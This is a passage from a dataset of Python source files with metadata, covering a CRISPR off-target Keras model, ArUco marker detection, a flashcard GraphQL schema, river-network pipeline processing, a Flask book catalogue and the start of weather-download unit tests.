if label_item == 0.0:\r\n negative.append(ll)\r\n else:\r\n positive.append(ll)\r\n data_list.append(data_item)\r\n label.append(label_item)\r\n return negative, positive, label\r\n\r\n\r\nVOCAB_SIZE = 16\r\nEMBED_SIZE = 90\r\nBATCH_SIZE = 256\r\nMAXLEN = 23\r\n\r\nnegative, positive, label = loadData('data/test_off-target.txt')\r\n\r\npositive, negative = np.array(positive), np.array(negative)\r\n\r\ntrain_positive, test_positive = train_test_split(positive, test_size=0.2, random_state=42)\r\ntrain_negative, test_negative = train_test_split(negative, test_size=0.2, random_state=42)\r\n\r\nxtest = np.vstack((test_negative, test_positive))\r\nxtest = np.array(xtest)\r\n\r\n\r\ndef main():\r\n input = Input(shape=(23,))\r\n embedded = Embedding(VOCAB_SIZE, EMBED_SIZE, input_length=MAXLEN)(input)\r\n\r\n conv1 = Conv1D(20, 5, name=\"conv1\")(embedded)\r\n ac1 = Activation('relu')(conv1)\r\n B1 = BatchNormalization()(ac1)\r\n\r\n conv2 = Conv1D(40, 5, name=\"conv2\")(B1)\r\n ac2 = Activation('relu')(conv2)\r\n B2 = BatchNormalization()(ac2)\r\n\r\n conv3 = Conv1D(80, 5, name=\"conv3\")(B2)\r\n ac3 = Activation('relu')(conv3)\r\n B3 = BatchNormalization()(ac3)\r\n\r\n conv11 = Conv1D(80, 9, name=\"conv11\")(B1)\r\n x = Lambda(lambda x: attention(x[0], x[1], 11))([conv11, B3])\r\n\r\n flat = Flatten()(x)\r\n dense1 = Dense(40, name=\"dense1\")(flat)\r\n ac4 = Activation('relu')(dense1)\r\n drop1 = Dropout(0.2)(ac4)\r\n\r\n dense2 = Dense(20, name=\"dense2\")(drop1)\r\n ac5 = Activation('relu')(dense2)\r\n drop2 = Dropout(0.2)(ac5)\r\n\r\n dense3 = Dense(2, name=\"dense3\")(drop2)\r\n output = Activation('softmax')(dense3)\r\n\r\n model = Model(inputs=[input], outputs=[output])\r\n\r\n print(\"Loading weights for the models\")\r\n model.load_weights('weights/CRISPR-OFFT.h5')\r\n\r\n print(\"Predicting on test data\")\r\n y_pred = model.predict(xtest[:, 3:])\r\n print(y_pred)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": "CRISPR-OFFT.py", "file_name": "CRISPR-OFFT.py", "file_ext": "py", "file_size_in_byte": 3506, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.environ", "line_number": 4, "usage_type": "attribute"}, {"api_name": "keras.layers.core.Reshape", "line_number": 27, "usage_type": "call"}, {"api_name": "keras.layers.core.Reshape", "line_number": 28, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.initializers.RandomUniform", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 31, "usage_type": "call"}, {"api_name": "keras.initializers.RandomUniform", "line_number": 31, "usage_type": "call"}, {"api_name": "keras.layers.add", "line_number": 32, "usage_type": "call"}, {"api_name": "keras.layers", "line_number": 32, "usage_type": "attribute"}, {"api_name": "keras.layers.core.Dense", "line_number": 33, "usage_type": "call"}, {"api_name": "keras.layers.core.Permute", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.layers.multiply", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 64, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.layers.embeddings.Embedding", "line_number": 73, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv1D", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 76, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 77, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv1D", "line_number": 79, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 80, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 81, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv1D", "line_number": 83, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 84, "usage_type": "call"}, {"api_name": "keras.layers.BatchNormalization", "line_number": 85, "usage_type": "call"}, {"api_name": "keras.layers.convolutional.Conv1D", "line_number": 87, "usage_type": "call"}, {"api_name": "keras.layers.core.Lambda", "line_number": 88, "usage_type": "call"}, {"api_name": "keras.layers.core.Flatten", "line_number": 90, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 91, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 92, "usage_type": "call"}, {"api_name": "keras.layers.core.Dropout", "line_number": 93, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 95, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 96, "usage_type": "call"}, {"api_name": "keras.layers.core.Dropout", "line_number": 97, "usage_type": "call"}, {"api_name": "keras.layers.core.Dense", "line_number": 99, "usage_type": "call"}, {"api_name": "keras.layers.Activation", "line_number": 100, "usage_type": "call"}]}
+{"seq_id": "152101269", "text": "#!/usr/bin/env python\nimport cv2\nimport cv2.aruco as aruco\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\nmarkerLength = 350\ncamera_matrix = np.asmatrix([[613.299988, 0.0, 354.949005],[0.0, 0.0, 612.106018],[214.380005, 0.0, 1.0]])\ndist_coeffs = (-0.439, 0.263, 0.001, 0.0, -0.113)\n \nwhile(True):\n ret, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)\n parameters = aruco.DetectorParameters_create()\n\n corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, aruco_dict, parameters=parameters)\n if type(ids) != type(None):\n rvec,tvec,z = aruco.estimatePoseSingleMarkers(corners, markerLength, camera_matrix, dist_coeffs)\n #rvec, tvec = aruco.estimatePoseSingleMarkers(corners, markerLength, camera_matrix, dist_coeffs)\n imgWithAruco = aruco.drawDetectedMarkers(gray, corners, ids)\n imgWithAruco = aruco.drawAxis(imgWithAruco, camera_matrix, dist_coeffs, rvec, tvec, 100)\n cv2.imshow('frame',imgWithAruco)\n else:\n pass\n \n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n", "sub_path": "scripts/detect_aruco_markers.py", "file_name": "detect_aruco_markers.py", "file_ext": "py", "file_size_in_byte": 1207, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "cv2.VideoCapture", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.asmatrix", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.aruco.Dictionary_get", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.aruco", "line_number": 14, "usage_type": "name"}, {"api_name": "cv2.aruco.DICT_6X6_250", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.aruco.DetectorParameters_create", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.aruco", "line_number": 15, "usage_type": "name"}, {"api_name": "cv2.aruco.detectMarkers", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.aruco", "line_number": 17, "usage_type": "name"}, {"api_name": "cv2.aruco.estimatePoseSingleMarkers", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.aruco", "line_number": 19, "usage_type": "name"}, {"api_name": "cv2.aruco.drawDetectedMarkers", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.aruco", "line_number": 21, "usage_type": "name"}, {"api_name": "cv2.aruco.drawAxis", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.aruco", "line_number": 22, "usage_type": "name"}, {"api_name": "cv2.imshow", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 33, "usage_type": "call"}]}
+{"seq_id": "225613945", "text": "import graphene\nfrom django.contrib.contenttypes.models import ContentType\nfrom graphene_django import (DjangoObjectType, )\nfrom graphql import GraphQLError\n\n\nfrom . import models\n\n\nclass ContentObjectType(DjangoObjectType):\n class Meta:\n model = ContentType\n\n\nclass FlashcardType(DjangoObjectType):\n question = graphene.String()\n\n def resolve_question(self: models.Flashcard, info):\n return self.question_content\n\n class Meta:\n model = models.Flashcard\n\n\nclass FlashcardCollectionType(DjangoObjectType):\n class Meta:\n model = models.FlashcardCollection\n\n\nclass TagType(DjangoObjectType):\n class Meta:\n model = models.Tag\n\n\nclass CategoryType(DjangoObjectType):\n class Meta:\n model = models.Category\n\n\nclass TextType(DjangoObjectType):\n class Meta:\n model = models.Text\n\n\nclass Query(graphene.ObjectType):\n flashcards = graphene.List(FlashcardType)\n collections = graphene.List(FlashcardCollectionType)\n tags = graphene.List(TagType)\n categories = graphene.List(CategoryType)\n\n def resolve_flashcards(self, info, **kwargs):\n return models.Flashcard.objects.all()\n\n def resolve_collections(self, info, **kwargs):\n return models.FlashcardCollection.objects.all()\n\n def resolve_tags(self, info, **kwargs):\n return models.Tag.objects.all()\n\n def resolve_categories(self, info, **kwargs):\n return models.Category.objects.all()\n\n\nclass CreateTextFlashcard(graphene.Mutation):\n flashcard = graphene.Field(FlashcardType)\n\n class Arguments:\n question = graphene.String(required=True)\n answer = graphene.String(required=True)\n collection = graphene.Int(required=True)\n\n def mutate(self, info, question, answer, collection):\n flashcard = models.Flashcard.objects.create_text_flashcard(question=question,\n answer=answer,\n collection_id=collection)\n return CreateTextFlashcard(flashcard=flashcard)\n\n\nclass DeleteFlashcard(graphene.Mutation):\n flashcard_id = graphene.Int()\n\n class Arguments:\n flashcard_id = graphene.Int(required=True)\n\n def mutate(self, info, flashcard_id):\n flashcard = models.Flashcard.objects.get(id=flashcard_id)\n flashcard.delete()\n return DeleteFlashcard(flashcard_id=flashcard_id)\n\n\nclass Mutation(graphene.ObjectType):\n create_text_flashcard = CreateTextFlashcard.Field()\n delete_flashcard = DeleteFlashcard.Field()\n", "sub_path": "flashback/core/schema.py", "file_name": "schema.py", "file_ext": "py", "file_size_in_byte": 2573, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "graphene_django.DjangoObjectType", "line_number": 10, "usage_type": "name"}, {"api_name": "django.contrib.contenttypes.models.ContentType", "line_number": 12, "usage_type": "name"}, {"api_name": "graphene_django.DjangoObjectType", "line_number": 15, "usage_type": "name"}, {"api_name": "graphene.String", "line_number": 16, "usage_type": "call"}, {"api_name": "graphene_django.DjangoObjectType", "line_number": 25, "usage_type": "name"}, {"api_name": "graphene_django.DjangoObjectType", "line_number": 30, "usage_type": "name"}, {"api_name": "graphene_django.DjangoObjectType", "line_number": 35, "usage_type": "name"}, {"api_name": "graphene_django.DjangoObjectType", "line_number": 40, "usage_type": "name"}, {"api_name": "graphene.ObjectType", "line_number": 45, "usage_type": "attribute"}, {"api_name": "graphene.List", "line_number": 46, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 47, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 48, "usage_type": "call"}, {"api_name": "graphene.List", "line_number": 49, "usage_type": "call"}, {"api_name": "graphene.Mutation", "line_number": 64, "usage_type": "attribute"}, {"api_name": "graphene.Field", "line_number": 65, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 68, "usage_type": "call"}, {"api_name": "graphene.String", "line_number": 69, "usage_type": "call"}, {"api_name": "graphene.Int", "line_number": 70, "usage_type": "call"}, {"api_name": "graphene.Mutation", "line_number": 79, "usage_type": "attribute"}, {"api_name": "graphene.Int", "line_number": 80, "usage_type": "call"}, {"api_name": "graphene.Int", "line_number": 83, "usage_type": "call"}, {"api_name": "graphene.ObjectType", "line_number": 91, "usage_type": "attribute"}]}
+{"seq_id": "112721262", "text": "from time import time\n\nimport pandas as pd\nimport geopandas as gp\nimport pygeos as pg\nimport numpy as np\nimport networkx as nx\n\nfrom nhdnet.nhd.joins import (\n index_joins,\n find_joins,\n find_join,\n create_upstream_index,\n remove_joins,\n)\n\n\ndef remove_flowlines(flowlines, joins, ids):\n \"\"\"Remove flowlines specified by ids from flowlines and joins\n\n\tParameters\n\t----------\n\tflowlines : GeoDataFrame\n\tjoins : DataFrame\n\t\tjoins between flowlines\n\tids : list-like\n\t\tlist of ids of flowlines to remove\n\n\tReturns\n\t-------\n\ttuple of (GeoDataFrame, DataFrame)\n\t\t(flowlines, joins)\n\t\"\"\"\n # drop from flowlines\n flowlines = flowlines.loc[~flowlines.NHDPlusID.isin(ids)].copy()\n\n # IDs are based on NHDPlusID, make sure to use correct columns for joins\n joins = remove_joins(\n joins, ids, downstream_col=\"downstream\", upstream_col=\"upstream\"\n )\n\n # update our ids to match zeroed out ids\n joins.loc[joins.downstream == 0, \"downstream_id\"] = 0\n joins.loc[joins.downstream == 0, \"type\"] = \"terminal\"\n joins.loc[joins.upstream == 0, \"upstream_id\"] = 0\n\n return flowlines, joins\n\n\ndef remove_pipelines(flowlines, joins, max_pipeline_length=100):\n \"\"\"Remove pipelines that are above max length,\n\tbased on contiguous length of pipeline segments.\n\n\tParameters\n\t----------\n\tflowlines : GeoDataFrame\n\tjoins : DataFrame\n\t\tjoins between flowlines\n\tmax_pipeline_length : int, optional (default: 100)\n\t\tlength above which pipelines are dropped\n\n\tReturns\n\t-------\n\ttuple of (GeoDataFrame, DataFrame)\n\t\t(flowlines, joins)\n\t\"\"\"\n\n start = time()\n pids = flowlines.loc[flowlines.FType == 428].index\n pjoins = find_joins(\n joins, pids, downstream_col=\"downstream_id\", upstream_col=\"upstream_id\"\n )[[\"downstream_id\", \"upstream_id\"]]\n print(\n \"Found {:,} pipelines and {:,} pipeline-related joins\".format(\n len(pids), len(pjoins)\n )\n )\n\n # Drop any isolated pipelines no matter what size\n # these either are one segment long, or are upstream / downstream terminals for\n # non-pipeline segments\n join_idx = index_joins(\n pjoins, downstream_col=\"downstream_id\", upstream_col=\"upstream_id\"\n )\n drop_ids = join_idx.loc[\n (\n join_idx.upstream_id == join_idx.downstream_id\n ) # has upstream and downstream of 0s\n | (\n ((join_idx.upstream_id == 0) & (~join_idx.downstream_id.isin(pids)))\n | ((join_idx.downstream_id == 0) & (~join_idx.upstream_id.isin(pids)))\n )\n ].index\n print(\"Removing {:,} isolated segments\".format(len(drop_ids)))\n\n # remove from flowlines, joins, pjoins\n flowlines = flowlines.loc[~flowlines.index.isin(drop_ids)].copy()\n joins = remove_joins(\n joins, drop_ids, downstream_col=\"downstream_id\", upstream_col=\"upstream_id\"\n )\n pjoins = remove_joins(\n pjoins, drop_ids, downstream_col=\"downstream_id\", upstream_col=\"upstream_id\"\n )\n join_idx = join_idx.loc[~join_idx.index.isin(drop_ids)].copy()\n\n # Find single connectors between non-pipeline segments\n # drop those > max_pipeline_length\n singles = join_idx.loc[\n ~(join_idx.upstream_id.isin(pids) | join_idx.downstream_id.isin(pids))\n ].join(flowlines[\"length\"])\n drop_ids = singles.loc[singles.length >= max_pipeline_length].index\n\n print(\n \"Found {:,} pipeline segments between flowlines that are > {:,}m; they will be dropped\".format(\n len(drop_ids), max_pipeline_length\n )\n )\n\n # remove from flowlines, joins, pjoins\n flowlines = flowlines.loc[~flowlines.index.isin(drop_ids)].copy()\n joins = remove_joins(\n joins, drop_ids, downstream_col=\"downstream_id\", upstream_col=\"upstream_id\"\n )\n pjoins = remove_joins(\n pjoins, drop_ids, downstream_col=\"downstream_id\", upstream_col=\"upstream_id\"\n )\n join_idx = join_idx.loc[~join_idx.index.isin(drop_ids)].copy()\n\n ### create a network of pipelines to group them together\n # Only use contiguous pipelines; those that are not contiguous should have been handled above\n nodes = pjoins.loc[pjoins.upstream_id.isin(pids) & pjoins.downstream_id.isin(pids)]\n network = nx.from_pandas_edgelist(nodes, \"downstream_id\", \"upstream_id\")\n components = pd.Series(nx.connected_components(network)).apply(list)\n\n groups = (\n pd.DataFrame(components.explode().rename(\"lineID\"))\n .reset_index()\n .rename(columns={\"index\": \"group\"})\n )\n groups = groups.join(flowlines[[\"length\"]], on=\"lineID\")\n stats = groups.groupby(\"group\").agg({\"length\": \"sum\"})\n drop_groups = stats.loc[stats.length >= max_pipeline_length].index\n drop_ids = groups.loc[groups.group.isin(drop_groups)].lineID\n\n print(\n \"Dropping {:,} pipelines that are greater than {:,}\".format(\n len(drop_ids), max_pipeline_length\n )\n )\n\n flowlines = flowlines.loc[~flowlines.index.isin(drop_ids)].copy()\n joins = remove_joins(\n joins, drop_ids, downstream_col=\"downstream_id\", upstream_col=\"upstream_id\"\n )\n\n # update NHDPlusIDs to match zeroed out ids\n # joins.loc[joins.downstream_id == 0, \"downstream\"] = 0\n joins.loc[\n (joins.downstream_id == 0) & (joins.type == \"internal\"), \"type\"\n ] = \"former_pipeline_join\"\n # joins.loc[joins.upstream_id == 0, \"upstream\"] = 0\n\n print(\"Done processing pipelines in {:.2f}s\".format(time() - start))\n\n return flowlines, joins\n\n\n# pygeos version of nhdnet.geometry.lines::calculate_sinuosity\ndef calculate_sinuosity(geometries):\n \"\"\"Calculate sinuosity of the line.\n\n This is the length of the line divided by the distance between the endpoints of the line.\n By definition, it is always >=1.\n\n Parameters\n ----------\n geometries : Series or ndarray of pygeos geometries\n\n Returns\n -------\n Series or ndarray\n sinuosity values\n \"\"\"\n\n # By definition, sinuosity should not be less than 1\n first = pg.get_point(geometries, 0)\n last = pg.get_point(geometries, -1)\n straight_line_distance = pg.distance(first, last)\n\n sinuosity = np.ones((len(geometries),)).astype(\"float32\")\n\n # if there is no straight line distance there can be no sinuosity\n ix = straight_line_distance > 0\n\n # by definition, all values must be at least 1, so clip lower bound\n sinuosity[ix] = (pg.length(geometries[ix]) / straight_line_distance).clip(1)\n\n if isinstance(geometries, pd.Series):\n return pd.Series(sinuosity, index=geometries.index)\n\n return sinuosity\n", "sub_path": "analysis/prep/network/lib/lines.py", "file_name": "lines.py", "file_ext": "py", "file_size_in_byte": 6521, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "nhdnet.nhd.joins.remove_joins", "line_number": 38, "usage_type": "call"}, {"api_name": "time.time", "line_number": 68, "usage_type": "call"}, {"api_name": "nhdnet.nhd.joins.find_joins", "line_number": 70, "usage_type": "call"}, {"api_name": "nhdnet.nhd.joins.index_joins", "line_number": 82, "usage_type": "call"}, {"api_name": "nhdnet.nhd.joins.remove_joins", "line_number": 98, "usage_type": "call"}, {"api_name": "nhdnet.nhd.joins.remove_joins", "line_number": 101, "usage_type": "call"}, {"api_name": "nhdnet.nhd.joins.remove_joins", "line_number": 121, "usage_type": "call"}, {"api_name": "nhdnet.nhd.joins.remove_joins", "line_number": 124, "usage_type": "call"}, {"api_name": "networkx.from_pandas_edgelist", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 133, "usage_type": "call"}, {"api_name": "networkx.connected_components", "line_number": 133, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 136, "usage_type": "call"}, {"api_name": "nhdnet.nhd.joins.remove_joins", "line_number": 152, "usage_type": "call"}, {"api_name": "time.time", "line_number": 163, "usage_type": "call"}, {"api_name": "pygeos.get_point", "line_number": 186, "usage_type": "call"}, {"api_name": "pygeos.get_point", "line_number": 187, "usage_type": "call"}, {"api_name": "pygeos.distance", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 190, "usage_type": "call"}, {"api_name": "pygeos.length", "line_number": 196, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 198, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 199, "usage_type": "call"}]}
+{"seq_id": "372031261", "text": "from flask import (\r\n Blueprint, render_template, request, redirect, url_for\r\n)\r\nfrom web.bookdb import get_db \r\nfrom web.files import save_img, write_file\r\n\r\nbp = Blueprint('books', __name__) #'authors'から書き換える\r\n\r\n@bp.route('/books', methods=['GET'])\r\ndef all():\r\n db=get_db()\r\n alldata = db.execute('SELECT * FROM books').fetchall()\r\n return render_template('books/all.html', books=alldata)\r\n\r\n@bp.route('/books/new', methods=['GET', 'POST'])\r\ndef new():\r\n db = get_db() #GETでもPOSTでもデータベースを使う\r\n if request.method == 'POST':\r\n title = request.form['title']\r\n author = request.form['author']\r\n db.execute(\r\n \"INSERT INTO books (title, author) VALUES (?, ?)\",\r\n (title, author) #coverは初期値を用いる\r\n )\r\n db.commit() \r\n return redirect(url_for('books.all'))\r\n #GETの場合、著者の集合authorsを渡す\r\n authors = db.execute('SELECT * FROM authors').fetchall()\r\n return render_template('books/new.html', authors=authors)\r\n\r\n@bp.route('/books/show/', methods=['GET'])\r\ndef show(book_id):\r\n db=get_db()\r\n book = db.execute('SELECT * FROM books where id=?', book_id).fetchone()\r\n return render_template('books/show.html', book=book)\r\n\r\n@bp.route('/books/upload/', methods=['GET', 'POST'])\r\ndef upload(book_id):\r\n db=get_db()\r\n if request.method == 'POST':\r\n if 'file' in request.files: #リクエストにファイル情報が含まれていたら\r\n file = request.files['file']\r\n save_img(file) #files.pyで定義したメソッド\r\n db.execute( #表booksでのファイル名を初期値から固有値に変更\r\n \"UPDATE books SET cover=? where id=?\",\r\n (file.filename, book_id)\r\n )\r\n db.commit()\r\n \r\n #ファイルのアップロードに失敗したときの処置\r\n return redirect(url_for('books.show',book_id=book_id) )\r\n\r\n #GETで読み込まれた時 \r\n book = db.execute('SELECT * FROM books where id=?', book_id).fetchone()\r\n return render_template('books/upload.html', book=book)\r\n\r\n@bp.route('/books/write', methods=['GET'])\r\ndef write():\r\n cvs_str=\"\"\r\n db=get_db()\r\n alldata = db.execute('SELECT * FROM books').fetchall()\r\n for data in alldata:\r\n cvs_str += \",\".join([data['title'],data['author'],data['cover']])\r\n cvs_str += \"\\n\"\r\n write_file(\"books.csv\",cvs_str) \r\n return render_template('books/write.html', str=cvs_str)\r\n\r\n\r\n", "sub_path": "flask_web/flask-web2/web/books.py", "file_name": "books.py", "file_ext": "py", "file_size_in_byte": 2567, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "flask.Blueprint", "line_number": 7, "usage_type": "call"}, {"api_name": "web.bookdb.get_db", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 13, "usage_type": "call"}, {"api_name": "web.bookdb.get_db", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 29, "usage_type": "call"}, {"api_name": "web.bookdb.get_db", "line_number": 33, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 35, "usage_type": "call"}, {"api_name": "web.bookdb.get_db", "line_number": 39, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 42, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 42, "usage_type": "name"}, {"api_name": "web.files.save_img", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 55, "usage_type": "call"}, {"api_name": "web.bookdb.get_db", "line_number": 60, "usage_type": "call"}, {"api_name": "web.files.write_file", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 66, "usage_type": "call"}]}
+{"seq_id": "314815240", "text": "# Copyright 2013 – present by the SalishSeaCast Project contributors\n# and The University of British Columbia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# SPDX-License-Identifier: Apache-2.0\n\n\n\"\"\"Unit tests for SalishSeaCast download_weather worker.\n\"\"\"\nimport logging\nimport textwrap\nfrom pathlib import Path\nfrom types import SimpleNamespace\nfrom unittest.mock import patch\n\nimport arrow\nimport nemo_nowcast\nimport pytest\n\nfrom nowcast.workers import download_weather\n\n\n@pytest.fixture()\ndef config(base_config):\n \"\"\":py:class:`nemo_nowcast.Config` instance from YAML fragment to use as config for unit tests.\"\"\"\n config_file = Path(base_config.file)\n with config_file.open(\"at\") as f:\n f.write(\n textwrap.dedent(\n \"\"\"\\\n file group: allen\n\n weather:\n download:\n 2.5 km:\n datamart dir: /SalishSeaCast/datamart/hrdps-continental/\n GRIB dir: /results/forcing/atmospheric/continental2.5/GRIB/\n url template: \"https://hpfx.collab.science.gc.ca/{date}/WXO-DD/model_hrdps/continental/2.5km/{forecast}/{hour}/{filename}\"\n ECCC file template: \"{date}T{forecast}Z_MSC_HRDPS_{variable}_RLatLon0.0225_PT{hour}H.grib2\"\n variables:\n - [UGRD_AGL-10m, u10, u_wind] # u component of wind velocity at 10m elevation\n - [VGRD_AGL-10m, v10, v_wind] # v component of wind velocity at 10m elevation\n - [DSWRF_Sfc, ssrd, solar] # accumulated downward shortwave (solar) radiation at ground level\n - [DLWRF_Sfc, strd, therm_rad] # accumulated downward longwave (thermal) radiation at ground level\n - [LHTFL_Sfc, lhtfl, LHTFL_surface] # upward surface latent heat flux (for VHFR FVCOM)\n - [TMP_AGL-2m, t2m, tair] # air temperature at 2m elevation\n - [SPFH_AGL-2m, sh2, qair] # specific humidity at 2m elevation\n - [RH_AGL-2m, r2, RH_2maboveground] # relative humidity at 2m elevation (for VHFR FVCOM)\n - [APCP_Sfc, unknown, precip] # accumulated precipitation at ground level\n - [PRATE_Sfc, prate, PRATE_surface] # precipitation rate at ground level (for VHFR FVCOM)\n - [PRMSL_MSL, prmsl, atmpres] # atmospheric pressure at mean sea level\n forecast duration: 48 # hours\n\n 1 km:\n GRIB dir: /results/forcing/atmospheric/GEM1.0/GRIB/\n url template: \"https://dd.alpha.meteo.gc.ca/model_hrdps/west/1km/grib2/{forecast}/{hour}/{filename}\"\n ECCC file template: \"CMC_hrdps_west_{variable}_rotated_latlon0.009x0.009_{date}T{forecast}Z_P{hour}-00.grib2\"\n variables:\n - UGRD_TGL_10 # u component of wind velocity at 10m elevation\n - VGRD_TGL_10 # v component of wind velocity at 10m elevation\n - DSWRF_SFC_0 # accumulated downward shortwave (solar) radiation at ground level\n - DLWRF_SFC_0 # accumulated downward longwave (thermal) radiation at ground level\n - LHTFL_SFC_0 # upward surface latent heat flux (for VHFR FVCOM)\n - TMP_TGL_2 # air temperature at 2m elevation\n - SPFH_TGL_2 # specific humidity at 2m elevation\n - RH_TGL_2 # relative humidity at 2m elevation (for VHFR FVCOM)\n - APCP_SFC_0 # accumulated precipitation at ground level\n - PRATE_SFC_0 # precipitation rate at ground level (for VHFR FVCOM)\n - PRMSL_MSL_0 # atmospheric pressure at mean sea level\n forecast duration: 36 # hours\n \"\"\"\n )\n )\n config_ = nemo_nowcast.Config()\n config_.load(config_file)\n return config_\n\n\n@pytest.fixture\ndef mock_worker(mock_nowcast_worker, monkeypatch):\n monkeypatch.setattr(download_weather, \"NowcastWorker\", mock_nowcast_worker)\n\n\nclass TestMain:\n \"\"\"Unit tests for main() function.\"\"\"\n\n def test_instantiate_worker(self, mock_worker):\n worker = download_weather.main()\n assert worker.name == \"download_weather\"\n assert worker.description.startswith(\n \"SalishSeaCast worker that downloads the GRIB2 files from the 00, 06, 12, or 18\"\n )\n\n def test_add_forecast_arg(self, mock_worker):\n worker = download_weather.main()\n assert worker.cli.parser._actions[3].dest == \"forecast\"\n assert worker.cli.parser._actions[3].choices == {\"00\", \"06\", \"12\", \"18\"}\n assert worker.cli.parser._actions[3].help\n\n def test_add_resolution_arg(self, mock_worker):\n worker = download_weather.main()\n assert worker.cli.parser._actions[4].dest == \"resolution\"\n assert worker.cli.parser._actions[4].choices == {\"1km\", \"2.5km\"}\n assert worker.cli.parser._actions[4].default == \"2.5km\"\n assert worker.cli.parser._actions[4].help\n\n def test_add_data_date_option(self, mock_worker):\n worker = download_weather.main()\n assert worker.cli.parser._actions[5].dest == \"run_date\"\n expected = nemo_nowcast.cli.CommandLineInterface.arrow_date\n assert worker.cli.parser._actions[5].type == expected\n assert worker.cli.parser._actions[5].default == arrow.now().floor(\"day\")\n assert worker.cli.parser._actions[5].help\n\n def test_add_verify_certs_option(self, mock_worker):\n worker = download_weather.main()\n assert 